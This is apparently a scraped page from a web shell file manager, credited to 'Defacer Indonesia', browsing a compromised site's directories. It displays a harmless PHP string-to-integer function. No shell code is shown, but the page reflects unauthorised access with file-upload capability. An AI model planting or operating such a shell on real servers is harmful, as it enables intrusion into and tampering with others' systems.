whoami7 - Manager
:
/
proc
/
self
/
root
/
home
/
kckglobal
/
public_html
/
portal
/
vendor
/
azjezz
/
psl
/
src
/
Psl
/
Str
/
Upload File:
files >> //proc/self/root/home/kckglobal/public_html/portal/vendor/azjezz/psl/src/Psl/Str/to_int.php
<?php declare(strict_types=1); namespace Psl\Str; /** * Returns the given string as an integer, or null if the string isn't numeric. * * @pure */ function to_int(string $string): ?int { if ((string) (int) $string === $string) { return (int) $string; } return null; }
Copyright ©2021 || Defacer Indonesia